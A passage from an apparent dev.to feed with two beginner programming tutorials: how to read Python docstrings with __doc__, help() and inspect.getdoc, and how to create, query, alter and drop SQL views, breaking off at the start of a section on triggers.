        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;My name is &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;surname&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;. I am &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; years old.&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;additional&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here, we can use the following code to access the docstring of the Person class itself:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Person&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;__doc__&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt; &lt;span class="n"&gt;A&lt;/span&gt; &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;to&lt;/span&gt; &lt;span class="n"&gt;represent&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;

    &lt;span class="bp"&gt;...&lt;/span&gt;

    &lt;span class="n"&gt;Attributes&lt;/span&gt;
    &lt;span class="o"&gt;----------&lt;/span&gt;
    &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;
        &lt;span class="n"&gt;first&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;
    &lt;span class="n"&gt;surname&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;
        &lt;span class="n"&gt;family&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;
    &lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;
        &lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;

    &lt;span class="n"&gt;Methods&lt;/span&gt;
    &lt;span class="o"&gt;-------&lt;/span&gt;
    &lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;additional&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;""&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;Prints&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s name and age

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can also use the help() function to read the docstrings associated with various objects. Using the previous example, we can call help() on the Person class:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="nf"&gt;help&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Person&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;Help&lt;/span&gt; &lt;span class="n"&gt;on&lt;/span&gt; &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Person&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;module&lt;/span&gt; &lt;span class="n"&gt;__main__&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Person&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;builtins&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;object&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="nc"&gt;Person&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;surname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;A&lt;/span&gt; &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;to&lt;/span&gt; &lt;span class="n"&gt;represent&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="bp"&gt;...&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;Attributes&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="o"&gt;----------&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;first&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;surname&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;family&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;Methods&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="o"&gt;-------&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;additional&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;""&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;Prints&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s name and age.
 |  
 |  Methods defined here:
 |  
 |  __init__(self, name, surname, age)
 |      Constructs all the necessary attributes for the person object.
 |      
 |      Parameters
 |      ----------
 |          name : str
 |              first name of the person
 |          surname : str
 |              family name of the person
 |          age : int
 |              age of the person
 |  
 |  info(self, additional=&lt;/span&gt;&lt;span class="sh"&gt;''&lt;/span&gt;&lt;span class="s"&gt;)
 |      Prints the person&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;If&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;argument&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;additional&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="n"&gt;passed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;then&lt;/span&gt; &lt;span class="n"&gt;it&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="n"&gt;appended&lt;/span&gt; &lt;span class="n"&gt;after&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt; &lt;span class="n"&gt;info&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;Parameters&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="o"&gt;----------&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;additional&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;optional&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;          &lt;span class="n"&gt;More&lt;/span&gt; &lt;span class="n"&gt;info&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;be&lt;/span&gt; &lt;span class="nf"&gt;displayed &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;default&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;Returns&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="o"&gt;-------&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="bp"&gt;None&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="o"&gt;----------------------------------------------------------------------&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;Data&lt;/span&gt; &lt;span class="n"&gt;descriptors&lt;/span&gt; &lt;span class="n"&gt;defined&lt;/span&gt; &lt;span class="n"&gt;here&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;__dict__&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;dictionary&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;instance&lt;/span&gt; &lt;span class="nf"&gt;variables &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;defined&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;__weakref__&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="nb"&gt;list&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;weak&lt;/span&gt; &lt;span class="n"&gt;references&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="nf"&gt;object &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;defined&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here, we can see that the help() function retrieves the docstrings of the Person class along with the methods associated with that class.&lt;/p&gt;
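&lt;p&gt;Besides __doc__ and help(), the standard library's inspect.getdoc() returns a docstring with its indentation normalized, which is handy when the text is reused elsewhere. The sketch below uses a shortened, hypothetical version of the Person class (one attribute, and an info method that returns a string instead of printing) so that it runs on its own:&lt;/p&gt;

```python
import inspect


class Person:
    """A class to represent a person.

    Attributes
    ----------
    name : str
        first name of the person
    """

    def __init__(self, name):
        self.name = name

    def info(self):
        """Return a short description of the person."""
        return f"My name is {self.name}."


# Docstring exactly as stored on the class
raw_doc = Person.__doc__

# Same docstring with leading indentation cleaned up
clean_doc = inspect.getdoc(Person)

# Methods carry their own docstrings
method_doc = Person.info.__doc__

print(clean_doc)
print(method_doc)
```

&lt;p&gt;The same calls work on functions and modules, since they also expose __doc__.&lt;/p&gt;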

&lt;p&gt;We can write docstrings in several formats, such as reStructuredText (reST), Google style, or NumPy style. To learn more, visit &lt;a href="https://stackoverflow.com/questions/3898572/what-is-the-standard-python-docstring-format" rel="noopener noreferrer"&gt;https://stackoverflow.com/questions/3898572/what-is-the-standard-python-docstring-format&lt;/a&gt;&lt;br&gt;
We can also generate documentation from docstrings using tools like Sphinx. To learn more, visit &lt;a href="https://www.sphinx-doc.org/en/master/" rel="noopener noreferrer"&gt;https://www.sphinx-doc.org/en/master/&lt;/a&gt;&lt;/p&gt;

</description>
      <category>python</category>
    </item>
    <item>
      <title>Smarter Databases with SQL Views and Triggers</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Mon, 12 May 2025 08:50:32 +0000</pubDate>
      <link>https://dev.to/james_kariuki/smarter-databases-with-sql-views-and-triggers-4hkn</link>
      <guid>https://dev.to/james_kariuki/smarter-databases-with-sql-views-and-triggers-4hkn</guid>
      <description>&lt;p&gt;Most developers become proficient in SQL's fundamental CRUD operations, but that's like calling yourself a pro driver just because you can brake and steer. SQL's advanced toolkit includes views, triggers, indexes, and cursors; this article explores the first two. These features turn your database from a basic storage container into a more responsive, intelligent system. INSERT, SELECT, UPDATE, and DELETE are the fundamentals of data manipulation, but we're going to learn how views and triggers let your database handle half of the work.&lt;/p&gt;

&lt;h2&gt;
  
  
  Views
&lt;/h2&gt;

&lt;p&gt;A view in SQL is a virtual table based on the result set of a SELECT query. It does not store the data itself but provides a way to access and manipulate the data stored in one or more tables. Some advantages of using views are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Simplify Complex Queries: Encapsulate complex joins and conditions into a single object.&lt;/li&gt;
&lt;li&gt;Enhance Security: Restrict access to specific columns or rows.&lt;/li&gt;
&lt;li&gt;Present Data Flexibly: Provide tailored data views for different users.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Views are used in queries like regular tables but do not contain data themselves; they fetch data from the underlying tables. They do not accept parameters. Simple views can often be updated, but more complex ones (for example, those built on joins or aggregates) are typically read-only.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Operations with Views
&lt;/h3&gt;

&lt;h4&gt;
  
  
  1. Creating a View
&lt;/h4&gt;

&lt;p&gt;Views are created using the CREATE VIEW statement.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;VIEW&lt;/span&gt; &lt;span class="n"&gt;view_name&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;column1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;column2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;...&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;condition&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  2. Usage:
&lt;/h4&gt;

&lt;p&gt;Once created, views can be queried like regular tables.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;view_name&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An existing view can be removed with the DROP VIEW statement:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;DROP&lt;/span&gt; &lt;span class="k"&gt;VIEW&lt;/span&gt; &lt;span class="n"&gt;view_name&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Example Usage
&lt;/h4&gt;

&lt;p&gt;Assume we have the following employees table:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;employees&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="nb"&gt;INT&lt;/span&gt; &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="nb"&gt;VARCHAR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;department&lt;/span&gt; &lt;span class="nb"&gt;VARCHAR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;salary&lt;/span&gt; &lt;span class="nb"&gt;DECIMAL&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To create a view that displays employees from the Sales department:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;VIEW&lt;/span&gt; &lt;span class="n"&gt;sales_employees&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;salary&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;employees&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;department&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'Sales'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can then query the view like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;sales_employees&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
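
&lt;p&gt;To see that a view stores no data of its own, the following minimal sketch recreates the employees table and the sales_employees view in an in-memory SQLite database using Python's built-in sqlite3 module. The sample rows and the sales_names helper are made up for illustration, and SQLite is an assumption here; other engines behave the same way for a simple view like this one.&lt;/p&gt;

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE employees (
    id INT PRIMARY KEY,
    name VARCHAR(100),
    department VARCHAR(100),
    salary DECIMAL(10, 2)
);
INSERT INTO employees VALUES
    (1, 'Amina', 'Sales', 1200.00),
    (2, 'Brian', 'IT', 1500.00);
CREATE VIEW sales_employees AS
SELECT id, name, salary
FROM employees
WHERE department = 'Sales';
""")


def sales_names(connection):
    """Return the names currently visible through the view."""
    rows = connection.execute(
        "SELECT name FROM sales_employees ORDER BY id"
    ).fetchall()
    return [name for (name,) in rows]


before = sales_names(conn)

# Insert into the base table only; the view is never touched directly
conn.execute("INSERT INTO employees VALUES (3, 'Chen', 'Sales', 1100.00)")

after = sales_names(conn)
print(before, after)
```

&lt;p&gt;The new Sales employee shows up in the second query because the view's SELECT runs against the employees table each time the view is queried.&lt;/p&gt;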



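&lt;p&gt;To change the view's definition, for example to add a bonus column (ALTER VIEW ... AS is supported by MySQL and SQL Server; PostgreSQL uses CREATE OR REPLACE VIEW instead):&lt;br&gt;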
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;ALTER&lt;/span&gt; &lt;span class="k"&gt;VIEW&lt;/span&gt; &lt;span class="n"&gt;sales_employees&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;salary&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ROUND&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;salary&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;bonus&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;employees&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;department&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'Sales'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When dropping a view, it is safer to use the IF EXISTS clause, which prevents an error if the view does not exist:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;DROP&lt;/span&gt; &lt;span class="k"&gt;VIEW&lt;/span&gt; &lt;span class="n"&gt;IF&lt;/span&gt; &lt;span class="k"&gt;EXISTS&lt;/span&gt; &lt;span class="n"&gt;sales_employees&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Conclusion
&lt;/h4&gt;

&lt;p&gt;SQL views provide an efficient way to simplify complex queries, improve security, and present data in a more accessible format. By mastering the creation, management, and updating of views, we can improve the maintainability of our database systems.&lt;/p&gt;

&lt;h2&gt;
  
  
  Triggers
&lt;/h2&gt;

&lt;p&gt;An SQL trigger is a database object containing SQL logic that is automatically executed when a specific database event occurs. In other words, a database trigger is "triggered" by a particular event. &lt;/p&gt;

&lt;h3&gt;
  
  
  Types of Triggers
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;DML Triggers (Data Manipulation Language): These triggers fire in response to data manipulation events (INSERT, UPDATE, DELETE).&lt;/li&gt;
&lt;li&gt;DDL Triggers (Data Definition Language): These triggers fire in response to changes in the database schema (CREATE, ALTER, DROP).&lt;/li&gt;
&lt;li&gt;Logon Triggers: These triggers fire in response to logon events to the SQL Server.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Timing of Triggers
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;BEFORE Triggers: These triggers execute before the triggering action is performed.&lt;/li&gt;
&lt;li&gt;AFTER Triggers: These triggers execute after the triggering action is performed.&lt;/li&gt;
&lt;li&gt;INSTEAD OF Triggers: These triggers replace the triggering action.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Key Operations with Triggers
&lt;/h3&gt;

&lt;h4&gt;
  
  
  1. Creating Triggers
&lt;/h4&gt;

&lt;p&gt;The basic syntax of an SQL trigger includes the creation statement, the event that activates the trigger, and the SQL statements that define the trigger's actions. Here’s a general template for creating a trigger.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TRIGGER&lt;/span&gt; &lt;span class="k"&gt;trigger_name&lt;/span&gt;
&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="k"&gt;BEFORE&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="k"&gt;AFTER&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="k"&gt;INSERT&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="k"&gt;UPDATE&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="k"&gt;DELETE&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;EACH&lt;/span&gt; &lt;span class="k"&gt;ROW&lt;/span&gt;
&lt;span class="k"&gt;BEGIN&lt;/span&gt;
    &lt;span class="c1"&gt;-- SQL statements&lt;/span&gt;
&lt;span class="k"&gt;END&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
